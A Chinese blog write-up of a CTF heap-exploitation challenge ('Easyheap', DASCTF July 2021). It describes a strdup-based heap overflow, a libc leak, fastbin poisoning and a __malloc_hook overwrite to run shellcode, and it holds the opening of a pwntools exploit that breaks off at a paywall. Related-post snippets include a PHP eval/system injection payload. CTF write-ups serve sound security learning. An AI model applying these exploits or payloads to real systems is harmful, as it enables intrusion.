2021DASCTF实战精英夏令营暨DASCTF July X CBCTF Easyheap

最新推荐文章于 2025-05-02 21:55:28 发布
原创 最新推荐文章于 2025-05-02 21:55:28 发布 · 335 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细分析了一个存在堆溢出漏洞的程序,通过申请和释放内存,利用Fastbin Poisoning策略篡改内存结构,最终实现对__malloc_hook的控制,从而执行自定义shellcode,获取程序控制权。该过程涉及到了内存管理、指针篡改和系统调用等关键知识点。

在这里插入图片描述保护是全开。

在这里插入图片描述开了一块空间,这块空间权限都有。

但是下面开了沙箱,ban了execve。

add
在这里插入图片描述
正常申请空间,写大小。
但是有个问题,我们输入要申请的空间大小之后,使用了一个strdup函数。
这个函数会根据你的字符串自动申请空间,那么就意味着我可以写0x500的大小,但是只输了一个字节。
就会造成溢出。

delete
在这里插入图片描述清空了。

show
在这里插入图片描述正常输出。

edit
在这里插入图片描述编写。

所以我们整个看下来,存在的问题就是有堆溢出。

那么我们利用这个溢出,首先申请释放一个大的chunk,挂进unsortedbin。
然后通过溢出,将上一个chunk内容一直写到这个chunk的fd前面,然后输出的时候就可以把地址带出来。

然后我们攻击,我们通过fastbin posioning,攻击fd,先申请到0x23330000,将shellcode写进去,再攻击malloc_hook,把0x23330000写道malloc_hook就可以了。

exp

from pwn import*

context.log_level = "debug"
context.arch = "amd64"
r = remote("node4.buuoj.cn", "28994")
#r = process("./Easyheap")
libc = ELF("./64/libc-2.27.so")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")

def add(size, content):
    r.sendlineafter(">> :\n", "1")
    r.sendlineafter("Size: \n", str(size))
    r.sendlineafter(
最低0.47元/天 解锁文章
yongbaoii
关注
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th WriteUp
mumuzi的博客
08-02 3687
最后十分钟掉了4名可还行 只写自己做了的,队友出的就不写了 Crypto:Yusa的密码学签到——BlockTrick 不知道啥意思,反正当复读机就行了。 MISC-问卷题 DASCTF{79f3bb47a2e2d46def82c052eccb7b80}
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1556
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
2021 DASCTF实战精英夏令营DASCTF July X CBCTF 4th easyjava
最新发布
m0_62501867的博客
05-02 398
2021 DASCTF实战精英夏令营DASCTF July X CBCTF 4th easyjava
2021DASCTF实战精英夏令营DASCTF July X CBCTF old_thing
yongbaoii的博客
08-12 510
RELRO半开。 进来以后首先需要登录。 用户名是admin,但是密码需要逆向一下。 进来之后是两个功能,一个leak,一个overflow。 因为开了canary,所以我们只要先把canary最后一个字节的’\x00’写掉,然后泄露一下就好了。 之后就是overflow一套带走。 ...
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th-MISC-ezSteganography
ookami6497的博客
08-12 628
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th-MISC-ezSteganography 赛后复现一下 下载得到一张图片,说是flag就藏在里面 用StegSolve打开,使用方法可以参考这个Stegsolve使用方法还有这个 在Red0 找到提示信息,说有东西在G plane里面 在Green plane0看到了一点东西 比赛的时候以为就是这张图里面有东西,,,结果要提取bin文件出来。。。 只勾选g0,然后save bin 保存
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 321
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 985
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
2021 MAR-DASCTF drinksometea
qq_37073764的博客
03-31 819
新手第一次见这种题,记录一下 压缩包给了一个exe还有一个png.out,那个png.out不知道干嘛用的。 查一下exe有无加壳,无,拖入ida进行分析。 程序流程不难,就是先从tea.png读入数据,然后经过中间的函数处理,然后把输出输出到tea.png.out。 题目要我们做的就是,用那个out文件,还原出png文件 进入4010A0函数,发现ida根本分析不了: 原来这就是传说中的花指令。 看了别的大佬博客才知道,对于00401116,有红色的这行语句按U,然后在Hex-view那里,把那行数据
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 772
胡小楠的刷题日常
2020 CTF暑假夏令营培训Day1 安全杂项Misc
小哈里的博客
08-14 1163
Day1安全杂项 WSL安装 程序和功能-启动windows功能-WSL win商店-ubuntu安装 file命令,查看文件格式 ubuntu账户:gwj12345,repeat Kali Linux账户:gwj12345,repeat 工具: 01编辑器(主要),Archpr(暴力开压缩包),AuDaCity(查看音频文件),JDK(JAVA运行环境),mp3SteGo(音频隐写),StegSolve(图片隐写),Wireshark(流量分析) 隐藏数据,文件拼接:copy /b 1.png+1.
2020 CTF暑假夏令营培训Day2 密码学Crypto 部分笔记
小哈里的博客
10-09 996
Day2密码学 - Crypto 架构 研究内容有:信息m的加密A、解密B、加密后的信息C(第三方是否可窃取)。 密码的分类:古典密码(关注算法的机密性,一般是置换和代换,打乱顺序,变量映射等),现代密码(假设算法大家都知道,关注信息本身的复杂度) 序列密码,核心为PRNG(伪随机数生成器)生成伪随机数序列,通过加密函数与明文加密生成密文,解密时生成一样的序列,用逆函数运算。 古典密码 历史:斯巴达密码棒,凯撒,维吉尼亚,希尔Hill,山农shannon,公钥ECC,DES,然后RSA,DSA,ECD
ctf-夏令营-crypto
zhang14916的博客
09-02 1283
1.通过nc端口可以获得一个加密算法的五个参数n,e,d,c2,r。几次nc发现参数n,e,d不发生变化,而c2和r在不断的变化,所以猜测这是一个RSA加密,而c2和r都是密文,进行尝试,发现c2解出的明文与r^-1相乘可以获得一段有意义的明文,即为答案 import gmpy2 def shuchu(mingwenstr): if mingwenstr[len(mingwenstr)...
2020DASCTF——七月赛
cwr1499640048的博客
07-25 1487
CRYPTO——bullshit 题目源代码 def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,len(message)
2021DASCTF实战精英夏令营“签到”
weixin_48427966的博客
08-03 340
靶机地址: node4.buuoj.cn:28466 kali里面运行命令,出现第一行加密,将第一行加密复制,再次回车,出现try again。 然后再次输入以后,出现flag。
.wav异或提取png 提取blue通道数值并转换写成zip文件(2022DASCTF x SU 三月春季挑战赛 书鱼的秘密)
诚邀网络通信领域商务合作
03-28 3085
文章目录一、.wav异或提取png二、提取blue通道数值并转换写成zip文件三、输入法九键+国际区号解密码 2022DASCTF x SU 三月春季挑战赛 书鱼的秘密 题目wp参考来源: 2022DASCTF x SU 三月春季挑战赛wp–WHT战队 一、.wav异或提取png 从data之后的第二个 k 之后开始,每隔10个字节,有一个字节的数据,其余的都是填充,混淆之类的数据。 把前几个字节提取出来与 233 异或。发现最终结果是png字节流文件尾的逆序。 编写脚本,将这些数据提取出来,异或,然后
DASCTF七月赛-web
Pr0m1se1n的博客
08-06 970
之前复现的了。。哎 Ezfileinclude 首页一张图片,看src就可以看出文件包含 验证了时间戳,参数t很容易能看出来 尝试用php://filter 伪协议读源码读不到,发现是用…/路径穿越 然后flag文件后缀不是是.php .txt .jpg什么的,就是flag!!! 直接来大师傅的脚本 import time import requests import base64 time = time.time() #获取时间戳(默认浮点型) t = int(time) #获取整型时间戳 pri
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp
七月的博客
10-26 4122
本篇文章原文:http://www.7yue.top/dasctf-oct-x-%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88-wp/ 雪殇杯好耶,顶碗人大胜利!!! WEB 迷路的魔法少女 ?attrid=0&attrstr=${eval(system('cat /etc/timezone'))} REVERSE 魔法叠加 pyc文件,改掉了magic,首先需要修复一下 前两位是版本信息,fuzz一下可知这是python3.7的pyc文件,正常python3.7的
DASCTF Oct X 吉林工师 欢迎来到魔法世界 部分wp
weixin_44088994的博客
11-21 4954
存一下题(呜呜呜菜狗就是菜狗wp都看不懂 参考:七月大佬DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WP – 七月的摸鱼历程 魔法密文 Writeup| DASCTF Oct X 吉林工师_张麦麦的博客 zhangmaimai.com-优快云博客 DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女_llx101388627的博客-优快云博客 签到 1.give you flag 2.闯入魔塔的魔法少女 3.魔法信息 4.魔法秘文 5.卡比卡比
DASCTF2020 7月月赛
qq_42158602的博客
07-25 871
bullshit 题目 from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,le
2021年夏季夏令营注册启动与指南
夏令营是一种常见的教育活动,通常在学校的暑假期间举行,旨在通过各种户外活动和课程来教育和娱乐儿童和青少年。 2. 星火营地与Spark Camp '21 描述中提到了星火营地注册以及Spark Camp '21,这很可能是夏令营活动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值